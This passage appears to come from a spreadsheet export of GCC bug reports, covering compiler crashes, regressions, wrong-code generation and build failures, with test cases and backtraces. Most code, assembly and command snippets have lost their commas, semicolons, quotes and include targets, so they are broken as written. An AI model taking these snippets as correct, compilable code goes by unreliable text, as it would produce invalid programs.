     instructions for the 387.  Specify this option to avoid generating
     those instructions. This option is the default on FreeBSD.  As of
     revision 2.6.1 these instructions are not generated unless you
     also use the `-ffast-math' switch.
Well reading this made me curious and I wrote a
simple piece of code like this:
#include 
double sindbl (double inp) {
  return sin (inp)
}
gives (-march=athlon -O9):
sindbl:
	pushl	%ebp
	movl	%esp %ebp
	subl	$8 %esp
	leave
	jmp	sin
so there's actually a subfunction call to sin() generated
for something that i586/i686/athlon/k6 can easily
do with inline asm.
-ffast-math changes this:
sindbl:
	pushl	%ebp
	movl	%esp %ebp
	fldl	8(%ebp)
#APP
	fsin
#NO_APP
	popl	%ebp
	ret
The point being that i586 upto athlon always
include an FPU so there's no need to look for
FPU software emulator support unless explicitly
wanted by the user.
Also -ffast-math turns on some more optimizations
that may be unwanted.
And: Maybe another bug: Just adding
-mfancy-math-387 does _not_ produce inline asm
as I had expected. It _also_ calls sin() in 3.0.3
so the docs are wrong here too.
Release:
gcc version 3.0.3
Environment:
Linux 2.4.17 #4 Mon Feb 18 12:29:18 CET 2002 i686 unknown
BFD: GNU assembler version 2.11.90.0.8 (i386-redhat-linux) using BFD version 2.11.90.0.8
How-To-Repeat:
Create any C file #include  use something
like sin() compile with optimization and -march=i686
(or similar) and inspect object file or gcc -S output.</t>
  </si>
  <si>
    <t>tevessen</t>
  </si>
  <si>
    <t>GCC-14957</t>
  </si>
  <si>
    <t>testsuite issues</t>
  </si>
  <si>
    <t>1) noncompile : empty
2) execute
contains a few instances of incorrect or non-standard fortran (many accepted 
by ifc but that's no reference). 
incorrect equivalence:
intrinsic_fraction_exponent.f90
intrinsic_set_exponent.f90
arguments of different kind to max:
intrinsic_minmax.f90
syntax error (subroutine missing?):
stack_varsize.f90
non-standard intrinsic (dcmplx):
cmplx.f90
incorrect length of character variables passed:
intrinisic_index.f90
intrinisic_trim.f90
f95:
st_function.f90 line 32: Subobject of constant not allowed in statement
function
several instances where e.g. an integer is passed to a subroutine expecting a 
real. In principle that is illegal (but very common indeed).</t>
  </si>
  <si>
    <t>GCC-57978</t>
  </si>
  <si>
    <t>f951: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>Created attachment 30549
Error inducing source Time_series.f90 dependencies makefile
Compiling on RHEL 6.4. No .i90 file was created only .s. I've attached the makefile source code which causes the crash (Time_series.f90) and its dependencies. The code compiles and works as intended with ifort 12.1.4 on CentOS 6.4.
Output: 
---
gfortran -c -g -save-temps -fopenmp -fbacktrace -fbounds-check -ffree-line-length-none -fno-aggressive-loop-optimizations -finit-integer=0 -Wall -Wextra Time_series.f90
f951: internal compiler error: Segmentation fault
0x869a9f crash_signal
	../../gcc-4.8.1/gcc/toplev.c:332
0x568bd6 conformable_arrays
	../../gcc-4.8.1/gcc/fortran/resolve.c:7077
0x568bd6 resolve_allocate_expr
	../../gcc-4.8.1/gcc/fortran/resolve.c:7247
0x568bd6 resolve_allocate_deallocate
	../../gcc-4.8.1/gcc/fortran/resolve.c:7670
0x56b026 resolve_code
	../../gcc-4.8.1/gcc/fortran/resolve.c:10335
0x569f5b gfc_resolve_blocks(gfc_code* gfc_namespace*)
	../../gcc-4.8.1/gcc/fortran/resolve.c:9449
0x56a1ba resolve_code
	../../gcc-4.8.1/gcc/fortran/resolve.c:10121
0x569f5b gfc_resolve_blocks(gfc_code* gfc_namespace*)
	../../gcc-4.8.1/gcc/fortran/resolve.c:9449
0x56a1ba resolve_code
	../../gcc-4.8.1/gcc/fortran/resolve.c:10121
0x56cd1e resolve_codes
	../../gcc-4.8.1/gcc/fortran/resolve.c:14975
0x56cc27 resolve_codes
	../../gcc-4.8.1/gcc/fortran/resolve.c:14961
0x55dbf2 gfc_resolve
	../../gcc-4.8.1/gcc/fortran/resolve.c:15003
0x5522d6 gfc_parse_file()
	../../gcc-4.8.1/gcc/fortran/parse.c:4614
0x58de25 gfc_be_parse_file
	../../gcc-4.8.1/gcc/fortran/f95-lang.c:189
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
make: *** [Time_series.o] Error 1
---</t>
  </si>
  <si>
    <t>knyyys</t>
  </si>
  <si>
    <t>GCC-53349</t>
  </si>
  <si>
    <t>Internal compiler error with constexpr and recursive data type</t>
  </si>
  <si>
    <t>Created attachment 27404
The file which causes the internal error.
Compiling the attached file will cause an internal compiler error in gcc 4.7.0 under 32-bit Ubuntu 12.04:
g++-4.7 -std=c++11 rec_constexpr.cpp
...
constfft.cpp:16:47: internal compiler error: in cxx_eval_indirect_ref at cp/semantics.c:7400
If the copy constructor of Foo is removed it is clang 3.2 (trunk 156580) which will then fail.</t>
  </si>
  <si>
    <t>GCC-50912</t>
  </si>
  <si>
    <t>[4.7 regression] gimple assertion failure at gimple.h:1940 with -msse2</t>
  </si>
  <si>
    <t>Created attachment 25661
Concatenated testcase
This is a regression introduced by the recent changes related to vectorization.  If you compile the to-be-gnatchoped testcase with -O3 -msse2 you get:
eric@atlantis:~/build/gcc&gt; gcc/xgcc -Bgcc -S loop_optimization10.adb -O3 -msse2
+===========================GNAT BUG DETECTED==============================+
| 4.7.0 20111028 (experimental) [trunk revision 180610] (i586-suse-linux-gnu) GCC error:|
| gimple check: expected gimple_assign(error_mark) have                   |
|     gimple_call(block) in gimple_assign_rhs_code at gimple.h:1940       |
| Error detected around loop_optimization10.adb:7:4      
This compiles fine without -msse2.  The testcase can directly be added to the testsuite as gnat.dg/loop_optimization10.ad[sb].</t>
  </si>
  <si>
    <t>GCC-51758</t>
  </si>
  <si>
    <t>ICE with optional arguments of elemental procedures</t>
  </si>
  <si>
    <t>Follow-up to PR50981.
gfortran chokes with the testcase below.
with 4.7:
   internal compiler error: in gfc_trans_assignment_1 at fortran/trans-expr.c:6794
The code is accepted without the elemental cases and the null() seems to be handled correctly.
with 4.5:
  a = foo((/ 1 1 /) null())
                      1
Error: Rank mismatch in argument 'b' at (1) (1 and 0)
The code is accepted without the non-elemental case but the null() is mishandled.
program p
  integer :: a(2)
  integer :: b
  a = 0
  a = foo((/ 1 1 /) null())
  print * a
  !if (any(a /= 2)) call abort
  a = 0
  a = bar((/ 1 1 /) null())
  print * a
  !if (any(a /= 2)) call abort
! b = 0
! b = bar(1 null())
! print * a
  !if (b /= 2) call abort
contains
  function foo(a b)
    integer           :: a(:)
    integer optional :: b(:)
    integer           :: foo(size(a))
    if (present(b)) call abort
    foo = 2
  end function foo
  elemental function bar(a b)
    integer intent(in)           :: a
    integer intent(in) optional :: b
    integer                       :: bar
    bar = 2
    if (present(b)) bar = 1
  end function bar
end program p</t>
  </si>
  <si>
    <t>GCC-12566</t>
  </si>
  <si>
    <t>ugly ERROR_MARK use</t>
  </si>
  <si>
    <t>&gt; Two the C++ frontend uses build (ERROR_MARK type) in cp_fname_init.  This
&gt; is horrible but I haven't gotten around to fixing it yet.  Nathan what is
&gt; the point of doing that rather than just leaving DECL_INITIAL null?
I think it must be something about it being an initializer for a constant.
Without the init something else complains. We should be able to be cleaner
by making a better 'magic' initializer with some kind of dependent value.</t>
  </si>
  <si>
    <t>GCC-4295</t>
  </si>
  <si>
    <t>Install problem for fastjar on Cygwin</t>
  </si>
  <si>
    <t>After doing the 'make bootstrap' (which works) the 'make install' fails
in directory fastjar with a message like :
chmod : file /usr/bin/#inst.1250# does not exist.
Release:
GCC-3.0.1
Environment:
i686-pc-cygwin</t>
  </si>
  <si>
    <t>openup01</t>
  </si>
  <si>
    <t>GCC-28913</t>
  </si>
  <si>
    <t>make install required before testing libgomp and gfortran</t>
  </si>
  <si>
    <t>gfortran and libgomp tests do not link the just-built libraries when make check is run unless the libraries are first installed in $prefix/lib.
This results in the following differences in the reported error rate for gfortran:
Testing after running make install:
&lt; # of expected passes          14014
&lt; # of unexpected failures      33
Testing without running make install:
&gt; # of expected passes          13143
&gt; # of unexpected failures      824
For libgomp:
Testing after running make install:
&lt; # of expected passes          1075
&lt; # of unexpected failures      205
Testing without running make install:
&gt; # of expected passes          963
&gt; # of unexpected failures      317
The results after make install with two patches installed can be found at
http://gcc.gnu.org/ml/gcc-testresults/2006-08/msg01383.html</t>
  </si>
  <si>
    <t>GCC-67983</t>
  </si>
  <si>
    <t>ICE: Error reporting routines re-entered.</t>
  </si>
  <si>
    <t>Created attachment 36521
Unreduced testcase
Compiling the attached file with g++ -std=c++11 causes an ICE:
Internal compiler error: Error reporting routines re-entered.</t>
  </si>
  <si>
    <t>allan</t>
  </si>
  <si>
    <t>GCC-78189</t>
  </si>
  <si>
    <t>[5 Regression] movaps generated for unaligned store in aligned struct when struct is referenced via unaligned member.</t>
  </si>
  <si>
    <t>The code below when compiled with -O2 -ftree-slp-vectorize -Wall -Wextra generates:
  pxor   %xmm0%xmm0
  movaps %xmm00x10(%rdi)
for NullB. This causes a segfault as rdi contains the address of the 8-byte aligned misaligned member of struct B.
This does not happen if NullB uses reinterpret_cast instead of uint8_t* if misaligned and pad are swapped (so that misaligned is in fact aligned). B::Null() is also fine.
// Impl.h
#include 
struct A
{
	void * a
	void * b
}
struct alignas(16) B
{
	void * pad
	void * misaligned
	void * pad2
	A a
	void Null()
}
static_assert((offsetof(B a) % 16) == 8 A should be misaligned for this test)
void NullB(void * misalignedPtr)
// Impl.cpp
#include 
#include Impl.h
void B::Null()
{
	a.a = nullptr
	a.b = nullptr
}
void NullB(void * misalignedPtr)
{
	B* b = reinterpret_cast(reinterpret_cast(misalignedPtr) - offsetof(B misaligned))
	b-&gt;Null()
}
// main.cpp
#include Impl.h
int main()
{
	B b
	NullB(
	return 0
}
gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-redhat-linux/6.2.1/lto-wrapper
Target: x86_64-redhat-linux
Configured with: ../configure --enable-bootstrap --enable-languages=cc++objcobj-c++fortranadagolto --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-shared --enable-threads=posix --enable-checking=release --enable-multilib --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-gnu-unique-object --enable-linker-build-id --with-linker-hash-style=gnu --enable-plugin --enable-initfini-array --disable-libgcj --with-isl --enable-libmpx --enable-gnu-indirect-function --with-tune=generic --with-arch_32=i686 --build=x86_64-redhat-linux
Thread model: posix
gcc version 6.2.1 20160916 (Red Hat 6.2.1-2) (GCC)</t>
  </si>
  <si>
    <t>jwyatt</t>
  </si>
  <si>
    <t>GCC-73142</t>
  </si>
  <si>
    <t>[5/6 Regression] Reading a namelist fails - my code worked until 4.8.2</t>
  </si>
  <si>
    <t>Created attachment 39129
Minimum example
Hi folks
I am using the GCC package for Windows provided by www.equation.com. It looks like after version 4.8.2 a bug was introduced in the reading of namelists. The reading is rubbish when the data file has a certain format. But at least in Windows when you open the data file in a common editor you see identical content to a version of the data file which can be read correctly.
Attached please find the minimum example of my code. FileA.dat will work FileB.dat doesn't. There is no such problem when using GCC 4.8.2 and older versions.
That the bug was introduced is a pity because the code that does not work right now is part of a major Monte Carlo program used in high energy physics.
I would really appreciate if someone could fix this issue.
Sincerely
GÃ¼nter</t>
  </si>
  <si>
    <t>gweberbv</t>
  </si>
  <si>
    <t>GCC-15659</t>
  </si>
  <si>
    <t>libcpp fails looking for libintl.h</t>
  </si>
  <si>
    <t>Building in a new directory libcpp fails:
gcc -c   -g -O2  -DIN_GCC -DCROSS_COMPILE  -W -Wall -Wwrite-strings
-Wstrict-prototypes -Wmissing-prototypes  -fno-common -Wno-error 
-DHAVE_CONFIG_H    -I. -I. -I../../../gcc/gcc -I../../../gcc/gcc/.
-I../../../gcc/gcc/../include -I../../../gcc/gcc/../libcpp/include
-I../../../gcc/gcc/../libbanshee/libcompat -I../../../gcc/gcc/../libbanshee
-I../../../gcc/gcc/../libbanshee/points-to  c-parse.c -o c-parse.o
In file included from c-parse.y:43:
../../../gcc/gcc/intl.h:31:21: libintl.h: No such file or directory
gmake[1]: *** [c-parse.o] Error 1
just do something like the following:
mkdir x86-freebsd
cd x86-freebsd
../configure --target=i386-pc-linux
gmake</t>
  </si>
  <si>
    <t>GCC-8669</t>
  </si>
  <si>
    <t>[sparc-solaris2.6]ICE lookup_base_r at cp/search.c:283</t>
  </si>
  <si>
    <t>$ ../gcc/configure --prefix=/usr/local/gcc33 --with-cpu=ultrasparc --enable-languages=cc++f77javaobjc &amp;&amp; make CFLAGS=-O2 'LIBCFLAGS=-g -O2' 'LIBCXXFLAGS=-g -O2 -fno-implicit-templates' bootstrap
[...]
/export/home2/ask/build/gcc-build/gcc/xgcc -shared-libgcc -B/export/home2/ask/build/gcc-build/gcc
/ -nostdinc++ -L/export/home2/ask/build/gcc-build/sparc-sun-solaris2.6/libstdc++-v3/src -L/export
/home2/ask/build/gcc-build/sparc-sun-solaris2.6/libstdc++-v3/src/.libs -B/usr/local/gcc33/sparc-s
un-solaris2.6/bin/ -B/usr/local/gcc33/sparc-sun-solaris2.6/lib/ -isystem /usr/local/gcc33/sparc-s
un-solaris2.6/include -nostdinc++ -I/export/home2/ask/build/gcc-build/sparc-sun-solaris2.6/libstd
c++-v3/include/sparc-sun-solaris2.6 -I/export/home2/ask/build/gcc-build/sparc-sun-solaris2.6/libs
tdc++-v3/include -I../../../../gcc/libstdc++-v3/libsupc++ -I../../../../gcc/libstdc++-v3/libmath 
-g -O2 -fno-implicit-templates -Wall -Wno-format -W -Wwrite-strings -Winline -fdiagnostics-show-l
ocation=once -ffunction-sections -fdata-sections -g -c ../../../../gcc/libstdc++-v3/src/complex_io.cc  -fPIC -DPIC -o .libs/complex_io.o
In file included from /export/home2/ask/build/gcc-build/sparc-sun-solaris2.6/libstdc++-v3/include/sstream:635
                 from /export/home2/ask/build/gcc-build/sparc-sun-solaris2.6/libstdc++-v3/include/complex:51
                 from ../../../../gcc/libstdc++-v3/src/complex_io.cc:30:
/export/home2/ask/build/gcc-build/sparc-sun-solaris2.6/libstdc++-v3/include/iosfwd: In instantiation of `std::basic_iostream &gt;':
/export/home2/ask/build/gcc-build/sparc-sun-solaris2.6/libstdc++-v3/include/bits/sstream.tcc:231:   instantiated from `std::basic_stringstream std::allocator &gt;'
/export/home2/ask/build/gcc-build/sparc-sun-solaris2.6/libstdc++-v3/include/bits/sstream.tcc:231:   instantiated from here
/export/home2/ask/build/gcc-build/sparc-sun-solaris2.6/libstdc++-v3/include/iosfwd:64: internal compiler error: in
   lookup_base_r at cp/search.c:283
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[4]: *** [complex_io.lo] Error 1
make[4]: Leaving directory `/export/home2/ask/build/gcc-build/sparc-sun-solaris2.6/libstdc++-v3/src'
Release:
3.3 20021120 (experimental)
Environment:
SunOS iridium 5.6 Generic_105181-32 sun4u sparc SUNWUltra-5_10 with gcc 2.95.2</t>
  </si>
  <si>
    <t>ask</t>
  </si>
  <si>
    <t>GCC-51792</t>
  </si>
  <si>
    <t>[4.7 regression] fortran bootstrap failure: no previous prototype for 'resolve_typebound_function'</t>
  </si>
  <si>
    <t>Bootstrapping gcc-4.7-20120107 with fortran enabled and --disable-build-poststage1-with-cxx fails with:
/mnt/scratch/objdir47/./prev-gcc/xgcc -B/mnt/scratch/objdir47/./prev-gcc/ -B/mnt/scratch/install47/i686-pc-linux-gnu/bin/ -B/mnt/scratch/install47/i686-pc-linux-gnu/bin/ -B/mnt/scratch/install47/i686-pc-linux-gnu/lib/ -isystem /mnt/scratch/install47/i686-pc-linux-gnu/include -isystem /mnt/scratch/install47/i686-pc-linux-gnu/sys-include    -c  -DIN_GCC_FRONTEND -g -O2 -gtoggle -DIN_GCC   -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat   -DHAVE_CONFIG_H -I. -Ifortran -I/mnt/scratch/gcc-4.7-20120107/gcc -I/mnt/scratch/gcc-4.7-20120107/gcc/fortran -I/mnt/scratch/gcc-4.7-20120107/gcc/../include -I/mnt/scratch/gcc-4.7-20120107/gcc/../libcpp/include -I/home/mikpe/pkgs/linux-x86/gmp-5.0.2/include -I/home/mikpe/pkgs/linux-x86/mpfr-3.1.0/include -I/home/mikpe/pkgs/linux-x86/mpc-0.9/include  -I/mnt/scratch/gcc-4.7-20120107/gcc/../libdecnumber -I/mnt/scratch/gcc-4.7-20120107/gcc/../libdecnumber/bid -I../libdecnumber    /mnt/scratch/gcc-4.7-20120107/gcc/fortran/resolve.c -o fortran/resolve.o
/mnt/scratch/gcc-4.7-20120107/gcc/fortran/resolve.c:5891:1: error: no previous prototype for 'resolve_typebound_function' [-Werror=missing-prototypes]
cc1: all warnings being treated as errors
This is because r182754 (PR 46262 + 46328 + 51052 fix) deleted the 'static' for resolve_typebound_function even though nothing outside of resolve.c calls it and there is no previous prototype in scope.
Adding the 'static' back allows bootstrap to complete.
Yet another error missed due to the build-everything-with-c++-by-default change.</t>
  </si>
  <si>
    <t>GCC-18085</t>
  </si>
  <si>
    <t>[Ada] - C++ interoperability sample program fails 3.4.2 Linux 2.4.20-8 Red Hat 9.0</t>
  </si>
  <si>
    <t>This program source is modified (additional print statements) from:
http://gcc.gnu.org/onlinedocs/gcc-3.4.2/gnat_ugn_unw/A-Simple-Example.html#A-Simple-Example
An example of interoperating C++ and Ada code.  The results seem to
indicate that the calls between the two languages are working OK but
that the parameter passing isn't.  I guess that indicates something in the ABI
perhaps?
The final value in A::method2 should be 3030 and the intermediate
values in the Ada calls are wrong.
$ gcc -v
Reading specs from /opt/lib/gcc/i686-pc-linux-gnu/3.4.2/specs
Configured with: ./configure --prefix=/opt --enable-languages=adacc++
Thread model: posix
gcc version 3.4.2
$ uname -a
Linux ezekiel 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
$ cat /etc/issue
Red Hat Linux release 9 (Shrike)
Kernel \r on an \m
$./cpp_main
in A::A a_value = 1010
=== in A::method2 a_value was = 1010
in Ada_Method2 O_Value = 134582632
in Ada_Method2 A_Value =-1073749612
in A::method1 a_value = 2020
in Ada_Method2 O_Value = 134582632
in Ada_Method2 A_Value =-1073749612
in Ada_Method2 O_Value = 134582632
in Ada_Method2 A_Value = 3030
=== in A::method2 a_value = 2020
$ cat compile
#! /bin/csh
# compilation script to evidence the bug
gnatmake -c simple_cpp_interface
c++ -c cpp_main.C
c++ -c ex7.C
gnatbind -n simple_cpp_interface
gnatlink simple_cpp_interface -o cpp_main --LINK=c++  -lstdc++ ex7.o cpp_main.o
$ cat *.C *.h *.ad?
// cpp_main.C start
#include ex7.h
#include 
extern C {
  void adainit (void)
  void adafinal (void)
  void method1 (A *t)
}
void method1 (A *t)
{
t-&gt;method1 ()
}
int main ()
{
  A obj
  adainit ()
  obj.method2 (3030)
  adafinal ()
}
// cpp_main.C end
//ex7.C start
#include ex7.h
#include 
extern C { void ada_method2 (A *t int v)}
void A::method1 (void)
{
  a_value = 2020
  printf (in A::method1 a_value = %d \na_value)
}
void A::method2 (int v)
{
  printf (=== in A::method2 a_value was = %d \na_value)
  ada_method2 (this v)
  printf (=== in A::method2 a_value = %d \na_value)
}
A::A(void)
{
  a_value = 1010
  printf (in A::A a_value = %d \na_value)
}
//ex7.C end
// ex7.h start
class Origin {
 public:
  int o_value
}
class A : public Origin {
 public:
  void method1 (void)
  virtual void method2 (int v)
  A()
  int a_value
}
// ex7.h end
-- simple_cpp_interface.adb start
with Ada.Text_Io use Ada.Text_Io
package body Simple_Cpp_Interface is
procedure Ada_Method2 (This : in out A V : Integer) is
   begin
      Ada.Text_Io.Put_Line (in Ada_Method2 O_Value = &amp; Integer'Image
(This.O_Value))
      Ada.Text_Io.Put_Line (in Ada_Method2 A_Value = &amp; Integer'Image
(This.A_Value))
      Method1 (This)
      Ada.Text_Io.Put_Line (in Ada_Method2 O_Value = &amp; Integer'Image
(This.O_Value))
      Ada.Text_Io.Put_Line (in Ada_Method2 A_Value = &amp; Integer'Image
(This.A_Value))
      This.A_Value := V
      Ada.Text_Io.Put_Line (in Ada_Method2 O_Value = &amp; Integer'Image
(This.O_Value))
      Ada.Text_Io.Put_Line (in Ada_Method2 A_Value = &amp; Integer'Image
(This.A_Value))
   end Ada_Method2
end Simple_Cpp_Interface
-- simple_cpp_interface.adb end
-- simple_cpp_interface.ads start
package Simple_Cpp_Interface is
   type A is limited
      record
         O_Value : Integer
         A_Value : Integer
      end record
pragma Convention (CPP A)
procedure Method1 (This : in out A)
pragma Import (C Method1)
procedure Ada_Method2 (This : in out A V : Integer)
pragma Export (C Ada_Method2)
end Simple_Cpp_Interface
-- simple_cpp_interface.ads end</t>
  </si>
  <si>
    <t>GCC-21768</t>
  </si>
  <si>
    <t>[3.4 regression] ICE in error message due to violation of coding conventions</t>
  </si>
  <si>
    <t>Compiling the following code snippet with the German locale enabled
causes an ICE:
================================
template struct A
template struct A {}
================================
  bug.cc:1: Fehler: previous declaration Â»template int
 &gt; struct AÂ«
  bug.cc:2: Fehler: 2 Template-Parameter
  bug.cc:2: interner Compiler-Fehler: in pp_base_format_text bei
pretty-print.c:357
  Bitte senden Sie einen vollstÃ¤ndigen Fehlerbericht auf Englisch ein
  bearbeiten Sie die Quellen zunÃ¤chst mit einem PrÃ¤prozessor wenn es
  dienlich ist.
  Fehler in der deutschen Ãœbersetzung sind an de@li.org zu melden.
  Gehen Sie gemÃ¤ÃŸ den Hinweisen in  vor.
This is partly due to the fact that the code snippet in cp/pt.c that
generates the original message violates the coding conventions
(see http://www.gnu.org/prep/standards/standards.html#Internationalization):
      error (used %d template parameter%s instead of %d
		TREE_VEC_LENGTH (tmpl_parms) 
		TREE_VEC_LENGTH (tmpl_parms) == 1 ?  : s
		TREE_VEC_LENGTH (parms))
The patch below fixes that by removing the conditional and using
parameter(s) in the text. This should simplify i18n efforts.
=============================================================================
--- gcc/gcc/cp/pt.c	2005-05-25 00:00:57.000000000 +0200
+++ gcc/gcc/cp/pt.c	2005-05-25 00:35:03.000000000 +0200
@@ -322510 +32259 @@ redeclare_class_template (tree type tre
   if (TREE_VEC_LENGTH (parms) != TREE_VEC_LENGTH (tmpl_parms))
     {
       cp_error_at (previous declaration %qD tmpl)
-      error (used %d template parameter%s instead of %d
-		TREE_VEC_LENGTH (tmpl_parms) 
-		TREE_VEC_LENGTH (tmpl_parms) == 1 ?  : s
-		TREE_VEC_LENGTH (parms))
+      error (used %d template parameter(s) instead of %d
+	     TREE_VEC_LENGTH (tmpl_parms) 
+	     TREE_VEC_LENGTH (parms))
       return
     }
=============================================================================
Alternatively one could make two messages one for 1 parameter
and one for 0 or more than 1. But I don't think that this is worthwhile.
Btw do all languages use the plural form for 0 parameters?
That's an implicit assumption that might not be true.
The ICE with the German locale appeared in gcc 3.4.4 (before we did not
have a German translation for that error message).
Therefore I'd like to apply the patch not only to mainline but also
to the 3.4 and 4.0 branch as a first step towards removing the ICE.</t>
  </si>
  <si>
    <t>GCC-11070</t>
  </si>
  <si>
    <t>[3.4 regression] ICE in regenerate_decl_from_template after forgotten template for disambiguation</t>
  </si>
  <si>
    <t>(This is the ICE-on-mainline from 10992)
This ICEs on mainline:
--------------------------------
template  struct X {
    template 
    static int* execute(int* x) { return x }
}
template  void foo() {
  static bool const same = true
  X::execute (0)
}
template void foo ()
---------------------------------------------------
g/x&gt; /home/bangerth/bin/gcc-3.4-pre/bin/c++ -c y.cc
y.cc: In static member function `static int* X::execute(int*)':
y.cc:3:   instantiated from `static int* X::execute(int*) [with T = int bool
b = same]'
y.cc:8:   instantiated from `void foo() [with T = int]'
y.cc:11:   instantiated from here
y.cc:3: internal compiler error: in regenerate_decl_from_template at cp/pt.c:
   10691
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
g/x&gt; /home/bangerth/bin/gcc-3.3-pre/bin/c++ -c y.cc
y.cc: In function `void foo()':
y.cc:8: error: parse error before `&gt;' token
Thus 3.3 gives the right clue: we're missing the template keyword
for disambiguation but the ICE at an unrelated place is not
helpful in finding it.
W.</t>
  </si>
  <si>
    <t>GCC-46395</t>
  </si>
  <si>
    <t>[4.6 regression] FAIL: 22_locale/numpunct/members/pod/2.cc execution test</t>
  </si>
  <si>
    <t>Created attachment 22345
Preprocessed testcase
The patch for rtl-opt/33721 causes wrong code to be generated during postreload for 22_locale/numpunct/members/pod/2.cc.  The relevant difference is this:
@@ -401015 +401514 @@ _Z6test01v:
 	jsr _ZNSt6locale7classicEv
 .LEHE49:
 	move.l %a0-(%sp)
-	move.l %fp%d4
-	subq.l #6%d4
-	move.l %d4-(%sp)
+	moveq #-46%d4
+	pea (%fp%d4.l)
 	.cfi_escape 0x2e0x8
 	jsr _ZNSt6localeC1ERKS_
-	addq.l #4%sp
-	move.l %d4(%sp)
+	addq.l #8%sp
+	pea (%fp%d4.l)
 	pea 44(%a2)
-	lea (-10%fp)%a5
+	lea (-42%fp)%a5
 	move.l %a5%a1
 	lea _ZNSt9basic_iosIN9__gnu_cxx9characterItj11__mbstate_tEESt11char_traitsIS3_EE5imbueERKSt6locale%a4
 	lea _ZNSt6localeD1Ev%a3
This changes the value of %d4 but there are other uses of %d4 that still assume that it is the address of the variable loc.
	lea _ZNSt6localeD1Ev%a3
...
.L628:
	move.l %d4-(%sp)
	.cfi_escape 0x2e0x4
	jsr (%a3)
	addq.l #4%sp
...
.LEHB55:
	.cfi_escape 0x2e0x4
	jsr _Znwj
	clr.l 4(%a0)
	move.l #_ZTVSt7num_putIN9__gnu_cxx9characterItj11__mbstate_tEESt19ostreambuf_iteratorIS3_St11char_traitsIS3_EEE+8(%a0)
	move.l %a0(%sp)
	move.l %d4-(%sp)
	moveq #-38%d6
	add.l %fp%d6
	move.l %d6-(%sp)
	.cfi_escape 0x2e0xc
	jsr _ZNSt6localeC1ISt7num_putIN9__gnu_cxx9characterItj11__mbstate_tEESt19ostreambuf_iteratorIS5_St11char_traitsIS5_EEEEERKS_PT_</t>
  </si>
  <si>
    <t>GCC-35437</t>
  </si>
  <si>
    <t>[4.2 regression] ICE with struct containing incomplete type</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 4.0.0:
===========================
struct A
{
  int i
  struct A a
}
void foo()
{
  struct A b = { 0 }
}
===========================
bug.c:4: error: field 'a' has incomplete type
bug.c: In function 'foo':
bug.c:9: internal compiler error: in count_type_elements at expr.c:5001
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>simartin</t>
  </si>
  <si>
    <t>GCC-46093</t>
  </si>
  <si>
    <t>code compiled with -fsplit-stack crashes when passing large struct</t>
  </si>
  <si>
    <t>Created attachment 22091
testcase
Output (-g is not needed to reproduce):
$ gcc -fsplit-stack testcase.c -g
$ gdb ./a.out
...
Program received signal SIGSEGV Segmentation fault.
0x0000000000400ca9 in foo (s=...) at testcase.c:14
14        bar (s)
(gdb) bt
#0  0x0000000000400ca9 in foo (s=...) at testcase.c:14
#1  0x0000000000400d84 in __morestack () at /mnt/svn/gcc-trunk/libgcc/config/i386/morestack.S:374
#2  0x0000000000400d00 in main () at testcase.c:21
I am not sure if that can be a problem here but this is my binutils info:
$ ld -v
GNU ld (GNU Binutils) 2.20.1.20100303</t>
  </si>
  <si>
    <t>GCC-19075</t>
  </si>
  <si>
    <t>[4.0 regression] mmix-knuth-mmixware testsuite failure: gcc.dg/tree-ssa/loop-4.c arr_base</t>
  </si>
  <si>
    <t>With LAST_UPDATED: Sat Dec 18 23:55:05 UTC 2004 I get:
FAIL: gcc.dg/tree-ssa/loop-4.c scan-tree-dump-times arr_base[^\n\r]*= 0
No clue in gcc.log besides the FAIL: message above.
Last known to work with: Sat Dec 18 18:11:13 UTC 2004.
The update did not change the test.</t>
  </si>
  <si>
    <t>GCC-59296</t>
  </si>
  <si>
    <t>[c++11] ref-qualified member function is ambiguous</t>
  </si>
  <si>
    <t>The following code fails to compile:
struct S
{
    constexpr int foo() const  }
    constexpr int foo() const  }
}
int main()
{
    constexpr int i = S{}.foo()
}
The error I get is:
$ /usr/local/gcc-4.8.2/bin/g++ -std=gnu++11 -c test.cpp
test.cpp: In function â€˜int main()â€™:
test.cpp:9:31: error: call of overloaded â€˜foo()â€™ is ambiguous
     constexpr int i = S{}.foo()
                               ^
test.cpp:9:31: note: candidates are:
test.cpp:3:19: note: constexpr int S::foo() const &amp;
     constexpr int foo() const  }
                   ^
test.cpp:4:19: note: constexpr int S::foo() const &amp;&amp;
     constexpr int foo() const  }
                   ^
The code in question is not ambiguous. The object is clearly an rvalue so the &amp;&amp;-qualified member should be preferred.</t>
  </si>
  <si>
    <t>GCC-79672</t>
  </si>
  <si>
    <t>ICE with -Wduplicated-branches -fopenmp</t>
  </si>
  <si>
    <t>The followiong code snippet triggers an ICE on trunk when
compiled with -Wduplicated-branches -fopenmp:
================================
template void foo()
{
  if (N &gt; 0)
  {
#pragma omp parallel for
    for (int i = 0 i &lt; 10 ++i) 
  }
}
void bar()
{
  foo()
}
================================
bug.cc: In instantiation of 'void foo() [with int N = 0]':
bug.cc:12:10:   required from here
bug.cc:8:1: internal compiler error: in add_expr at tree.c:7925
 }
 ^
0xfe1677 inchash::add_expr(tree_node const* inchash::hash&amp; unsigned int)
	../../gcc/gcc/tree.c:7925
0xfe1af1 inchash::add_expr(tree_node const* inchash::hash&amp; unsigned int)
	../../gcc/gcc/tree.c:8010
0xfe1af1 inchash::add_expr(tree_node const* inchash::hash&amp; unsigned int)
	../../gcc/gcc/tree.c:8010
0xfe1af1 inchash::add_expr(tree_node const* inchash::hash&amp; unsigned int)
	../../gcc/gcc/tree.c:8010
0xfe1955 inchash::add_expr(tree_node const* inchash::hash&amp; unsigned int)
